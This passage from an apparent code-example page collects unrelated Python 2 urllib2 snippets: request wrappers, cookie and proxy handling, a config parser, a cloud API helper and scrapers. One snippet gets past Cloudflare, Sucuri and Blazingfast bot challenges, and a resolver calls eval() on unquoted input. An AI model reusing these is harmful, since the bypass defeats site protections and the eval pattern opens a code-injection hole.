                opener = urllib2.install_opener(opener)
            except:
                pass

        if url.startswith('//'): url = 'http:' + url

        _headers ={}
        try: _headers.update(headers)
        except: pass
        if 'User-Agent' in _headers:
            pass
        elif not mobile == True:
            #headers['User-Agent'] = agent()
            _headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            _headers['User-Agent'] = 'Apple-iPhone/701.341'
        if 'Referer' in _headers:
            pass
        elif referer is not None:
            _headers['Referer'] = referer
        if not 'Accept-Language' in _headers:
            _headers['Accept-Language'] = 'en-US'
        if 'X-Requested-With' in _headers:
            pass
        elif XHR == True:
            _headers['X-Requested-With'] = 'XMLHttpRequest'
        if 'Cookie' in _headers:
            pass
        elif not cookie == None:
            _headers['Cookie'] = cookie
        if 'Accept-Encoding' in _headers:
            pass
        elif compression and limit is None:
            _headers['Accept-Encoding'] = 'gzip'


        if redirect == False:

            #old implementation
            #class NoRedirection(urllib2.HTTPErrorProcessor):
            #    def http_response(self, request, response): return response

            #opener = urllib2.build_opener(NoRedirection)
            #opener = urllib2.install_opener(opener)

            class NoRedirectHandler(urllib2.HTTPRedirectHandler):
                def http_error_302(self, req, fp, code, msg, headers):
                    infourl = urllib.addinfourl(fp, headers, req.get_full_url())
                    infourl.status = code
                    infourl.code = code
                    return infourl
                http_error_300 = http_error_302
                http_error_301 = http_error_302
                http_error_303 = http_error_302
                http_error_307 = http_error_302

            opener = urllib2.build_opener(NoRedirectHandler())
            urllib2.install_opener(opener)

            try: del _headers['Referer']
            except: pass

        if isinstance(post, dict):
            post = utils.byteify(post)
            post = urllib.urlencode(post)

        url = utils.byteify(url)

        request = urllib2.Request(url, data=post)
        _add_request_header(request, _headers)


        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:

            if response.code == 503:
                cf_result = response.read(5242880)
                try: encoding = response.info().getheader('Content-Encoding')
                except: encoding = None
                if encoding == 'gzip':
                    cf_result = gzip.GzipFile(fileobj=StringIO.StringIO(cf_result)).read()

                if 'cf-browser-verification' in cf_result:

                    netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc)
                    
                    if not netloc.endswith('/'): netloc += '/'

                    ua = _headers['User-Agent']

                    cf = cache.get(cfcookie().get, 168, netloc, ua, timeout)

                    _headers['Cookie'] = cf

                    request = urllib2.Request(url, data=post)
                    _add_request_header(request, _headers)

                    response = urllib2.urlopen(request, timeout=int(timeout))
                else:
                    log_utils.log('Request-Error (%s): %s' % (str(response.code), url), log_utils.LOGDEBUG)
                    if error == False: return
            else:
                log_utils.log('Request-Error (%s): %s' % (str(response.code), url), log_utils.LOGDEBUG)
                if error == False: return


        if output == 'cookie':
            try: result = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])
            except: pass
            try: result = cf
            except: pass
            if close == True: response.close()
            return result

        elif output == 'geturl':
            result = response.geturl()
            if close == True: response.close()
            return result

        elif output == 'headers':
            result = response.headers
            if close == True: response.close()
            return result

        elif output == 'chunk':
            try: content = int(response.headers['Content-Length'])
            except: content = (2049 * 1024)
            if content < (2048 * 1024): return
            result = response.read(16 * 1024)
            if close == True: response.close()
            return result

        elif output == 'file_size':
            try: content = int(response.headers['Content-Length'])
            except: content = '0'
            response.close()
            return content
        
        if limit == '0':
            result = response.read(224 * 1024)
        elif not limit == None:
            result = response.read(int(limit) * 1024)
        else:
            result = response.read(5242880)

        try: encoding = response.info().getheader('Content-Encoding')
        except: encoding = None
        if encoding == 'gzip':
            result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read()


        if 'sucuri_cloudproxy_js' in result:
            su = sucuri().get(result)

            _headers['Cookie'] = su

            request = urllib2.Request(url, data=post)
            _add_request_header(request, _headers)

            response = urllib2.urlopen(request, timeout=int(timeout))

            if limit == '0':
                result = response.read(224 * 1024)
            elif not limit == None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

            try: encoding = response.info().getheader('Content-Encoding')
            except: encoding = None
            if encoding == 'gzip':
                result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read()

        if 'Blazingfast.io' in result and 'xhr.open' in result:
            netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc)
            ua = _headers['User-Agent']
            _headers['Cookie'] = cache.get(bfcookie().get, 168, netloc, ua, timeout)

            result = _basic_request(url, headers=_headers, post=post, timeout=timeout, limit=limit)

        if output == 'extended':
            try: response_headers = dict([(item[0].title(), item[1]) for item in response.info().items()])
            except: response_headers = response.headers
            response_code = str(response.code)
            try: cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])
            except: pass
            try: cookie = cf
            except: pass
            if close == True: response.close()
            return (result, response_code, response_headers, _headers, cookie)
        else:
            if close == True: response.close()
            return result
    except Exception as e:
        log_utils.log('Request-Error: (%s) => %s' % (str(e), url), log_utils.LOGDEBUG)
        return
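Because the wrapper above advertises 'Accept-Encoding: gzip' when no limit is set, the body can come back compressed; a standalone sketch of the same decode step it applies (URL and timeout are illustrative):

import gzip
import StringIO
import urllib2

req = urllib2.Request('http://example.com/', headers={'Accept-Encoding': 'gzip'})
response = urllib2.urlopen(req, timeout=30)
body = response.read()

# Mirror of the decode step above: only gunzip when the server says so.
if response.info().getheader('Content-Encoding') == 'gzip':
    body = gzip.GzipFile(fileobj=StringIO.StringIO(body)).read()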
Ejemplo n.º 41
0
from decimal import Decimal
from pygaga.helpers.cachedns_urllib import custom_dns_opener
from pygaga.helpers.urlutils import download, parse_html
from pygaga.helpers.statsd import statsd_timing
from pygaga.simplejson import loads
from pygaga.helpers.utils import get_val, get_num_val

from guang_crawler import comments_pb2

logger = logging.getLogger('CrawlLogger')

FLAGS = gflags.FLAGS

DEFAULT_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"
urllib2.install_opener(custom_dns_opener())

CURPAGE_RE = re.compile("^(.*currentPage=)([^&]*?)(&.*|)$")

JSON_RE = re.compile("^\s*jsonp_reviews_list\((.+)\)\s*$", re.M | re.S)
TM_JSON_RE = re.compile("^\s*TB.detailRate\s*=\s*(.+)$", re.M | re.S)
RATECOUNT_RE = re.compile("^.*<em>([0-9]+)</em>.*$", re.M | re.S)
DESCURL_RE = re.compile("http://dsc.taobaocdn.com/i\d[^\"']+\.desc[^\"']*",
                        re.M | re.S)
IMAGESTYLE_RE = re.compile("^.*url\(([^\)]+)\)$", re.M | re.S)


class TaobaoHtml:
    def __init__(self, item_id, num_id, is_tmall=False, max_comments=0):
        self.item_id = item_id
        self.num_id = num_id
Ejemplo n.º 42
0
    def __init__(self, username=None, password=None, filter=None, tmp_dir='/tmp'):
        ContentProvider.__init__(self, 'barrandov.tv', 'http://www.barrandov.tv', username, password, filter, tmp_dir)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar()))
        urllib2.install_opener(opener)
Ejemplo n.º 43
0
def read_config(config_file):
    global config

    if not os.path.isfile(config_file):
        exit("[!] missing configuration file '%s'" % config_file)
    else:
        print "[i] using configuration file '%s'" % config_file

    config.clear()

    try:
        array = None
        content = open(config_file, "rb").read()

        for line in content.split("\n"):
            line = line.strip('\r')
            line = re.sub(r"\s*#.*", "", line)
            if not line.strip():
                continue

            if line.count(' ') == 0:
                if re.search(r"[^\w]", line):
                    if array == "USERS":
                        exit("[!] invalid USERS entry '%s'\n[?] (hint: add whitespace at start of line)" % line)
                    else:
                        exit("[!] invalid configuration (line: '%s')" % line)
                array = line.upper()
                config[array] = []
                continue

            if array and line.startswith(' '):
                config[array].append(line.strip())
                continue
            else:
                array = None
                try:
                    name, value = line.strip().split(' ', 1)
                except ValueError:
                    name = line
                    value = ""
                finally:
                    name = name.strip().upper()
                    value = value.strip("'\"").strip()

            _ = os.environ.get("%s_%s" % (NAME.upper(), name))
            if _:
                value = _

            if any(name.startswith(_) for _ in ("USE_", "SET_", "CHECK_", "ENABLE_", "SHOW_", "DISABLE_")):
                value = value.lower() in ("1", "true")
            elif value.isdigit():
                value = int(value)
            else:
                for match in re.finditer(r"\$([A-Z0-9_]+)", value):
                    if match.group(1) in globals():
                        value = value.replace(match.group(0), str(globals()[match.group(1)]))
                    else:
                        value = value.replace(match.group(0), os.environ.get(match.group(1), match.group(0)))
                if name.endswith("_DIR"):
                    value = os.path.realpath(os.path.join(ROOT_DIR, os.path.expanduser(value)))

            config[name] = value

    except (IOError, OSError):
        pass

    for option in ("MONITOR_INTERFACE", "CAPTURE_BUFFER", "LOG_DIR"):
        if not option in config:
            exit("[!] missing mandatory option '%s' in configuration file '%s'" % (option, config_file))

    for entry in (config.USERS or []):
        if len(entry.split(':')) != 4:
            exit("[!] invalid USERS entry '%s'" % entry)
        if re.search(r"\$\d+\$", entry):
            exit("[!] invalid USERS entry '%s'\n[?] (hint: please update PBKDF2 hashes to SHA256 in your configuration file)" % entry)

    if config.SSL_PEM:
        config.SSL_PEM = config.SSL_PEM.replace('/', os.sep)

    if config.USER_WHITELIST:
        if ',' in config.USER_WHITELIST:
            print("[x] configuration value 'USER_WHITELIST' has been changed. Please use it to set location of whitelist file")
        elif not os.path.isfile(config.USER_WHITELIST):
            exit("[!] missing 'USER_WHITELIST' file '%s'" % config.USER_WHITELIST)
        else:
            read_whitelist()

    config.PROCESS_COUNT = int(config.PROCESS_COUNT or CPU_CORES)

    if config.USE_MULTIPROCESSING:
        print("[x] configuration switch 'USE_MULTIPROCESSING' is deprecated. Please use 'PROCESS_COUNT' instead")

    if config.DISABLE_LOCAL_LOG_STORAGE and not any((config.LOG_SERVER, config.SYSLOG_SERVER)):
        print("[x] configuration switch 'DISABLE_LOCAL_LOG_STORAGE' turned on and neither option 'LOG_SERVER' nor 'SYSLOG_SERVER' are set. Falling back to console output of event data")

    if config.UDP_ADDRESS is not None and config.UDP_PORT is None:
        exit("[!] usage of configuration value 'UDP_ADDRESS' requires also usage of 'UDP_PORT'")

    if config.UDP_ADDRESS is None and config.UDP_PORT is not None:
        exit("[!] usage of configuration value 'UDP_PORT' requires also usage of 'UDP_ADDRESS'")

    if not str(config.HTTP_PORT or "").isdigit():
        exit("[!] invalid configuration value for 'HTTP_PORT' ('%s')" % config.HTTP_PORT)

    if config.PROCESS_COUNT and subprocess.mswindows:
        print "[x] multiprocessing is currently not supported on Windows OS"
        config.PROCESS_COUNT = 1

    if config.CAPTURE_BUFFER:
        if str(config.CAPTURE_BUFFER or "").isdigit():
            config.CAPTURE_BUFFER = int(config.CAPTURE_BUFFER)
        elif re.search(r"\d+\s*[kKmMgG]B", config.CAPTURE_BUFFER):
            match = re.search(r"(\d+)\s*([kKmMgG])B", config.CAPTURE_BUFFER)
            config.CAPTURE_BUFFER = int(match.group(1)) * {"K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}[match.group(2).upper()]
        elif re.search(r"\d+%", config.CAPTURE_BUFFER):
            physmem = _get_total_physmem()

            if physmem:
                config.CAPTURE_BUFFER = physmem * int(re.search(r"(\d+)%", config.CAPTURE_BUFFER).group(1)) / 100
            else:
                exit("[!] unable to determine total physical memory. Please use absolute value for 'CAPTURE_BUFFER'")
        else:
            exit("[!] invalid configuration value for 'CAPTURE_BUFFER' ('%s')" % config.CAPTURE_BUFFER)

        config.CAPTURE_BUFFER = config.CAPTURE_BUFFER / BLOCK_LENGTH * BLOCK_LENGTH

    if config.PROXY_ADDRESS:
        PROXIES.update({"http": config.PROXY_ADDRESS, "https": config.PROXY_ADDRESS})
        opener = urllib2.build_opener(urllib2.ProxyHandler(PROXIES))
        urllib2.install_opener(opener)
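The CAPTURE_BUFFER handling above accepts a plain byte count, a size with a unit ("512MB"), or a percentage of physical memory ("25%"); a condensed sketch of the same parsing rules, with BLOCK_LENGTH and the memory figure as illustrative stand-ins:

import re

BLOCK_LENGTH = 1 << 20  # stand-in value; the real constant is defined elsewhere

def parse_capture_buffer(value, physmem=8 * 1024 ** 3):
    # "123456" -> bytes, "512MB" -> bytes, "25%" -> share of physical memory,
    # rounded down to whole capture blocks as read_config() does.
    if str(value).isdigit():
        size = int(value)
    elif re.search(r"\d+\s*[kKmMgG]B", value):
        match = re.search(r"(\d+)\s*([kKmMgG])B", value)
        size = int(match.group(1)) * {"K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}[match.group(2).upper()]
    elif re.search(r"\d+%", value):
        size = physmem * int(re.search(r"(\d+)%", value).group(1)) / 100
    else:
        raise ValueError("invalid value for 'CAPTURE_BUFFER' ('%s')" % value)
    return size / BLOCK_LENGTH * BLOCK_LENGTH

print parse_capture_buffer("512MB")
print parse_capture_buffer("25%")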
Ejemplo n.º 44
0
def read_body_and_headers(url, post=None, headers=[], follow_redirects=False, timeout=None):
    _log("read_body_and_headers " + url)
    if post is not None:
        _log("read_body_and_headers post=" + post)
    if len(headers) == 0:
        headers.append(["User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0"])

    # Start cookie lib
    ficherocookies = os.path.join(get_data_path(), 'cookies.dat')
    _log("read_body_and_headers cookies_file=" + ficherocookies)
    cj = None
    ClientCookie = None
    cookielib = None
    # Let's see if cookielib is available
    try:
        _log("read_body_and_headers importing cookielib")
        import cookielib
    except ImportError:
        # If importing cookielib fails, let's try ClientCookie
        _log("read_body_and_headers cookielib not available")
        try:
            _log("read_body_and_headers importing ClientCookie")
            import ClientCookie
        except ImportError:
            # ClientCookie isn't available either
            _log("read_body_and_headers ClientCookie not available")
            urlopen = urllib2.urlopen
            Request = urllib2.Request
        else:
            # imported ClientCookie
            _log("read_body_and_headers ClientCookie available")
            urlopen = ClientCookie.urlopen
            Request = ClientCookie.Request
            cj = ClientCookie.MozillaCookieJar()
    else:
        # importing cookielib worked; MozillaCookieJar is a subclass of
        # FileCookieJar with useful load and save methods
        _log("read_body_and_headers cookielib available")
        urlopen = urllib2.urlopen
        Request = urllib2.Request
        cj = cookielib.MozillaCookieJar()

    if cj is not None:
        # we successfully imported one of the two cookie handling modules
        _log("read_body_and_headers Cookies enabled")
        if os.path.isfile(ficherocookies):
            _log("read_body_and_headers Reading cookie file")
            try:
                # if we have a cookie file already saved, load the cookies into the Cookie Jar
                cj.load(ficherocookies)
            except:
                _log("read_body_and_headers Wrong cookie file, deleting...")
                os.remove(ficherocookies)
        # Now we need to get our Cookie Jar installed in the opener for fetching URLs
        if cookielib is not None:
            # with cookielib we get the HTTPCookieProcessor and install the opener in urllib2
            _log("read_body_and_headers opener using urllib2 (cookielib)")
            if not follow_redirects:
                opener = urllib2.build_opener(urllib2.HTTPHandler(debuglevel=http_debug_log_enabled), urllib2.HTTPCookieProcessor(cj), NoRedirectHandler())
            else:
                opener = urllib2.build_opener(urllib2.HTTPHandler(debuglevel=http_debug_log_enabled), urllib2.HTTPCookieProcessor(cj))
            urllib2.install_opener(opener)
        else:
            # with ClientCookie we get the HTTPCookieProcessor and install the opener in ClientCookie
            _log("read_body_and_headers opener using ClientCookie")
            opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj))
            ClientCookie.install_opener(opener)

    # -------------------------------------------------
    # Cookies installed, send the request
    # -------------------------------------------------
    inicio = time.clock()  # timer
    txheaders = {}  # dictionary for the headers

    # Build the request
    if post is None:
        _log("read_body_and_headers GET request")
    else:
        _log("read_body_and_headers POST request")
    # Add the headers
    _log("read_body_and_headers ---------------------------")
    for header in headers:
        _log("read_body_and_headers header %s=%s" % (str(header[0]), str(header[1])))
        txheaders[header[0]] = header[1]
    _log("read_body_and_headers ---------------------------")

    req = Request(url, post, txheaders)
    if timeout is None:
        handle = urlopen(req)
    else:
        # Available from Python 2.6 onwards --> handle = urlopen(req, timeout=timeout)
        # For all other versions:
        try:
            import socket
            deftimeout = socket.getdefaulttimeout()
            socket.setdefaulttimeout(timeout)
            handle = urlopen(req)
            socket.setdefaulttimeout(deftimeout)
        except:
            import sys
            for line in sys.exc_info():
                _log("%s" % line)

    cj.save(ficherocookies)  # update the cookie store

    # Read the data and close
    if handle.info().get('Content-Encoding') == 'gzip':
        buf = StringIO(handle.read())
        f = gzip.GzipFile(fileobj=buf)
        data = f.read()
    else:
        data = handle.read()

    info = handle.info()
    _log("read_body_and_headers Response")
    returnheaders = []
    _log("read_body_and_headers ---------------------------")
    for header in info:
        _log("read_body_and_headers " + header + "=" + info[header])
        returnheaders.append([header, info[header]])
    handle.close()
    _log("read_body_and_headers ---------------------------")
    '''
    # Send the request
    try: response = urllib2.urlopen(req)
    # If it fails, retry substituting special characters
    except:
        req = urllib2.Request(url.replace(" ","%20"))
        # Add the headers
        for header in headers: req.add_header(header[0],header[1])
        response = urllib2.urlopen(req)
    '''
    # Elapsed time
    fin = time.clock()
    _log("read_body_and_headers Downloaded in %d seconds " % (fin - inicio + 1))
    _log("read_body_and_headers body=" + data)
    return data, returnheaders
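A minimal call sketch for the helper above, assuming the surrounding module already provides _log(), get_data_path(), NoRedirectHandler and the urllib2/gzip/StringIO imports it relies on (URL and header values are illustrative):

data, returned_headers = read_body_and_headers(
    "http://example.com/page",
    headers=[["Referer", "http://example.com/"]],
    timeout=30)

for name, value in returned_headers:
    print name + ": " + value
print data[:200]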
Ejemplo n.º 45
0
def query(action=None, command=None, args=None, method='GET', data=None):
    '''
    Make a web call to a Parallels provider
    '''
    path = config.get_cloud_config_value('url',
                                         get_configured_provider(),
                                         __opts__,
                                         search_global=False)
    auth_handler = urllib2.HTTPBasicAuthHandler()
    auth_handler.add_password(
        realm='Parallels Instance Manager',
        uri=path,
        user=config.get_cloud_config_value('user',
                                           get_configured_provider(),
                                           __opts__,
                                           search_global=False),
        passwd=config.get_cloud_config_value('password',
                                             get_configured_provider(),
                                             __opts__,
                                             search_global=False))
    opener = urllib2.build_opener(auth_handler)
    urllib2.install_opener(opener)

    if action:
        path += action

    if command:
        path += '/{0}'.format(command)

    if not isinstance(args, dict):
        args = {}

    kwargs = {'data': data}
    if isinstance(data, str) and '<?xml' in data:
        kwargs['headers'] = {
            'Content-type': 'application/xml',
        }

    if args:
        params = urllib.urlencode(args)
        req = urllib2.Request(url='{0}?{1}'.format(path, params), **kwargs)
    else:
        req = urllib2.Request(url=path, **kwargs)

    req.get_method = lambda: method

    log.debug('{0} {1}'.format(method, req.get_full_url()))
    if data:
        log.debug(data)

    try:
        result = urllib2.urlopen(req)
        log.debug('PARALLELS Response Status Code: {0}'.format(
            result.getcode()))

        if 'content-length' in result.headers:
            content = result.read()
            result.close()
            items = ET.fromstring(content)
            return items

        return {}
    except urllib2.URLError as exc:
        log.error('PARALLELS Response Status Code: {0} {1}'.format(
            exc.code, exc.msg))
        root = ET.fromstring(exc.read())
        log.error(root)
        return {'error': root}
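The query() helper above authenticates through urllib2's HTTPBasicAuthHandler bound to the 'Parallels Instance Manager' realm; a stripped-down sketch of just that setup (endpoint and credentials are placeholders):

import urllib2

auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(
    realm='Parallels Instance Manager',       # realm used by the snippet above
    uri='https://127.0.0.1:4465/paci/v1.0/',  # placeholder endpoint
    user='admin',                             # placeholder credentials
    passwd='secret')
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)

req = urllib2.Request(url='https://127.0.0.1:4465/paci/v1.0/ve')
req.get_method = lambda: 'GET'
print urllib2.urlopen(req).read()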
Ejemplo n.º 46
0
def getRegexParsed(regexs,
                   url,
                   cookieJar=None,
                   forCookieJarOnly=False,
                   recursiveCall=False,
                   cachedPages={},
                   rawPost=False):  #0,1,2 = URL, regexOnly, CookieJarOnly
    if not recursiveCall:
        regexs = eval(urllib.unquote(regexs))
    #cachedPages = {}
    print 'url', url
    doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url)
    print 'doRegexs', doRegexs, regexs

    for k in doRegexs:
        if k in regexs:
            print 'processing ', k
            m = regexs[k]
            print m
            cookieJarParam = False
            if 'cookiejar' in m:  # so either create or reuse existing jar
                #print 'cookiejar exists',m['cookiejar']
                cookieJarParam = m['cookiejar']
                if '$doregex' in cookieJarParam:
                    cookieJar = getRegexParsed(regexs, m['cookiejar'],
                                               cookieJar, True, True,
                                               cachedPages)
                    cookieJarParam = True
                else:
                    cookieJarParam = True
            if cookieJarParam:
                if cookieJar == None:
                    print 'create cookie jar'
                    import cookielib
                    cookieJar = cookielib.LWPCookieJar()
                    #print 'cookieJar new',cookieJar

            if '$doregex' in m['page']:
                m['page'] = getRegexParsed(regexs,
                                           m['page'],
                                           cookieJar,
                                           recursiveCall=True,
                                           cachedPages=cachedPages)

            if 'post' in m and '$doregex' in m['post']:
                m['post'] = getRegexParsed(regexs,
                                           m['post'],
                                           cookieJar,
                                           recursiveCall=True,
                                           cachedPages=cachedPages)
                print 'post is now', m['post']

            if 'rawpost' in m and '$doregex' in m['rawpost']:
                m['rawpost'] = getRegexParsed(regexs,
                                              m['rawpost'],
                                              cookieJar,
                                              recursiveCall=True,
                                              cachedPages=cachedPages,
                                              rawPost=True)
                print 'rawpost is now', m['rawpost']

            if m['page'] in cachedPages and not 'ignorecache' in m and forCookieJarOnly == False:
                link = cachedPages[m['page']]
            else:
                #print 'Ingoring Cache',m['page']
                req = urllib2.Request(m['page'])
                print 'req', m['page']
                req.add_header(
                    'User-Agent',
                    'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1'
                )
                if 'refer' in m:
                    req.add_header('Referer', m['refer'])
                if 'agent' in m:
                    req.add_header('User-agent', m['agent'])
                if 'setcookie' in m:
                    print 'adding cookie', m['setcookie']
                    req.add_header('Cookie', m['setcookie'])

                if not cookieJar == None:
                    #print 'cookieJarVal',cookieJar
                    cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
                    opener = urllib2.build_opener(
                        cookie_handler, urllib2.HTTPBasicAuthHandler(),
                        urllib2.HTTPHandler())
                    opener = urllib2.install_opener(opener)
                #print 'after cookie jar'
                post = None

                if 'post' in m:
                    postData = m['post']
                    if '$LiveStreamRecaptcha' in postData:
                        (captcha_challenge,
                         captcha_word) = processRecaptcha(m['page'])
                        if captcha_challenge:
                            postData += 'recaptcha_challenge_field:' + captcha_challenge + ',recaptcha_response_field:' + captcha_word
                    splitpost = postData.split(',')
                    post = {}
                    for p in splitpost:
                        n = p.split(':')[0]
                        v = p.split(':')[1]
                        post[n] = v
                    post = urllib.urlencode(post)

                if 'rawpost' in m:
                    post = m['rawpost']
                    if '$LiveStreamRecaptcha' in post:
                        (captcha_challenge,
                         captcha_word) = processRecaptcha(m['page'])
                        if captcha_challenge:
                            post += '&recaptcha_challenge_field=' + captcha_challenge + '&recaptcha_response_field=' + captcha_word

                if post:
                    response = urllib2.urlopen(req, post)
                else:
                    response = urllib2.urlopen(req)

                link = response.read()
                link = javascriptUnEscape(link)

                response.close()
                cachedPages[m['page']] = link
                #print link
                print 'store link for', m['page'], forCookieJarOnly

                if forCookieJarOnly:
                    return cookieJar  # do nothing
                if '$doregex' in m['expre']:
                    m['expre'] = getRegexParsed(regexs,
                                                m['expre'],
                                                cookieJar,
                                                recursiveCall=True,
                                                cachedPages=cachedPages)

            print 'exp k and url'
            print m['expre'], k, url
            print 'aa'
            if not m['expre'] == '':
                print 'doing it ', m['expre']
                if not '$LiveStreamCaptcha' in m['expre']:
                    reg = re.compile(m['expre']).search(link)
                    val = reg.group(1).strip()
                    if rawPost:
                        print 'rawpost'
                        val = urllib.quote_plus(val)
                    if 'htmlunescape' in m:
                        #val=urllib.unquote_plus(val)
                        import HTMLParser
                        val = HTMLParser.HTMLParser().unescape(val)

                    url = url.replace("$doregex[" + k + "]", val)
                else:
                    val = askCaptcha(m, link, cookieJar)
                    print 'url and val', url, val
                    url = url.replace("$doregex[" + k + "]", val)
                    #return val
            else:
                url = url.replace("$doregex[" + k + "]", '')
    if '$epoctime$' in url:
        url = url.replace('$epoctime$', getEpocTime())
    if recursiveCall: return url
    print 'final url', url
    item = xbmcgui.ListItem(path=url)
    #setResolvedUrl
    #xbmc.playlist(xbmc.playlist_video).clear()
    #xbmc.playlist(xbmc.playlist_video).add(url)
    #xbmc.Player().play(item=url)
    xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
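The $doregex[...] placeholders resolved above come from a dictionary of named regex recipes; a simplified sketch of just the substitution step, with the recipe, URL and downloaded page body all made up:

import re

# Made-up recipe dict and page body, mirroring the structure getRegexParsed() expects.
regexs = {'token': {'page': 'http://example.com/player',
                    'expre': "file\s*=\s*'([^']+)'"}}
url = 'http://example.com/play?src=$doregex[token]'
link = "var file = 'http://example.com/stream.m3u8';"  # pretend this came from m['page']

for k in re.compile('\$doregex\[([^\]]*)\]').findall(url):
    m = regexs[k]
    val = re.compile(m['expre']).search(link).group(1).strip()
    url = url.replace('$doregex[' + k + ']', val)

print url  # -> http://example.com/play?src=http://example.com/stream.m3u8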
Ejemplo n.º 47
0
def fetchMiaopaiData():
    lastid = None
    dr = re.compile(r'<[^>]+>', re.S)
    uname = '/app/yxtk/script/useragent.txt'
    f1 = open("/app/yxtk/script/data/1905movienews.sql", 'w', buffering=-1)
    with open(uname) as f:
        useragents = f.readlines()
    userAgent = random.choice(useragents)
    headers = {
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Cache-Control':
        'max-age=0',
        'Accept-Encoding':
        'gzip, deflate, sdch',
        'Accept-Language':
        'zh-CN,zh;q=0.8',
        'Cache-Control':
        'max-age=0',
        'Connection':
        'keep-alive',
        'Cookie':
        '__uv_=6606525396; SpMLdaPxuv=m4127234796; CNZZDATA1253604207=1123659875-1462410988-null%7C1462410988; C_P_i=1; GED_PLAYLIST_ACTIVITY=W3sidSI6IkxxMnIiLCJ0IjoxNDYyNDE1MjExLCJlZCI6eyJqIjp7IkEiOnsidHQiOjkzLCJwZCI6OTMsImJzIjoxMCwiZXMiOjB9fSwiZiI6MTQ2MjQxNTIxMSwiYSI6W3sia3YiOnsiYyI6MSwibSI6NzEwfX0seyJrdiI6eyJjIjo2LCJzIjoyNCwibSI6NTE5fX0seyJrdiI6eyJtIjoxMzk2LCJzIjoxNCwiYyI6M319LHsia3YiOnsibSI6MjU0OCwiYyI6MX19LHsia3YiOnsicyI6MiwibSI6MjY3fX0seyJrdiI6eyJjIjo0LCJtIjozODY4LCJzIjo2fX1dfSwibnYiOjEsInBsIjo5MywibHQiOjE0NjI0MTUyMTF9XQ..; WOlTvIlgRpuvid_=1138; pvid=1462419488231; bfd_s=68774865.12702418.1462415058975; tmc=2.68774865.79541045.1462419484753.1462419484753.1462419488287; tma=68774865.23748224.1462415058979.1462415058979.1462415058979.1; tmd=15.68774865.23748224.1462415058979.; Hm_lvt_49411f7bde52035653f2e2b70a0bb6a5=1462415059; Hm_lpvt_49411f7bde52035653f2e2b70a0bb6a5=1462419488; Hm_lvt_5a9573957327e40b58294447cd1d8ad2=1462415059; Hm_lpvt_5a9573957327e40b58294447cd1d8ad2=1462419488; bfd_g=9de2782bcb754fd700004f6702618c9d556e9317; Hm_lvt_bfe9961e25bf081711e59b3f78be82d4=1462415059; Hm_lpvt_bfe9961e25bf081711e59b3f78be82d4=1462419488; WOlTvIlgRptime_=1462419488231',
        'Host':
        'www.1905.com',
        'Upgrade-Insecure-Requests':
        '1',
        'User-Agent':
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'
    }
    while True:
        for j in range(1, 3):
            time.sleep(1)
            pageNo = 0
            if j == 1:
                url = 'http://www.1905.com/list-p-catid-220.html'
            if j == 2:
                url = 'http://www.1905.com/film/#fixedLeftMod'
            print url
            try:
                encoding_support = ContentEncodingProcessor
                opener = urllib2.build_opener(encoding_support)
                opener.addheaders = [('User-agent', userAgent[:-2]),
                                     ('Accept-Encoding', "gzip, deflate")]
                urllib2.install_opener(opener)
                req = urllib2.urlopen(url.strip(), timeout=5)
                html = req.read()
                req.close()
                if html.find("<!DOCTYPE") == -1:
                    html = "<!DOCTYPE html><base href=http://learning.sohu.com><script type='text/javascript'>var pvinsight_page_ancestors = '200312880;401049313';</script><html><head><meta http-equiv='content-type' content='text/html; charset=utf-8' /></head><body>" + html + "</body></html>"
                try:
                    html = html.replace(
                        '<meta charset="utf-8">',
                        '<meta http-equiv="content-type" content="text/html; charset=utf-8" /'
                    )
                except Exception as e:
                    print e
                doc = pq(html)
                lis = doc('li.pic-pack-out')
                for li in lis.items():
                    movie_url = li('a.pic-url').attr('href')
                    m = re.findall(r'(\w*[0-9]+)\w*', str(movie_url))
                    if len(m) == 3:
                        movie_id = str(m[2])
                    else:
                        movie_id = '0000'
                    if li('a.pic-url').children('img').attr('src') is None:
                        movie_pic = " "
                        movie_id = '0000'
                    else:
                        movie_pic = li('a.pic-url').children('img').attr('src')
                    movie_title = "\" " + li('a.title').html().encode(
                        'utf8') + " \""
                    movie_title = movie_title.replace("\n", '')
                    movie_title = movie_title.replace(",", ',')
                    movie_date = li('span.timer').html()
                    imageUrl = qiniuUpdate(movie_pic.strip())

                    req = urllib2.Request(movie_url)
                    res = urllib2.urlopen(req)
                    html1 = unicode(res.read(), 'utf-8')
                    html1 = re.sub(r'<script>(.*?)</script>', '', html1)
                    res.close()
                    doc1 = pq(html1)
                    con = doc1('div.pic-content')
                    con('img').removeAttr("style")
                    con('img').removeAttr("width")
                    con('img').removeAttr("height")
                    con('img').attr("style", "width:100%")
                    p = con('div.pic-content').html()
                    if p is None or p == '':
                        continue
                    p = re.sub(r'&#13;', '', p)
                    p = re.sub(r'<style.*>([\S\s\t]*?)</style>', '', p)
                    p = re.sub(r'<script.*>([\S\s\t]*?)</script>', '', p)
                    p = re.sub(r'<p[^>]*>', '<p>', p)
                    p = re.sub(r'<(?!img|br|p|/p).*?>', '', p)
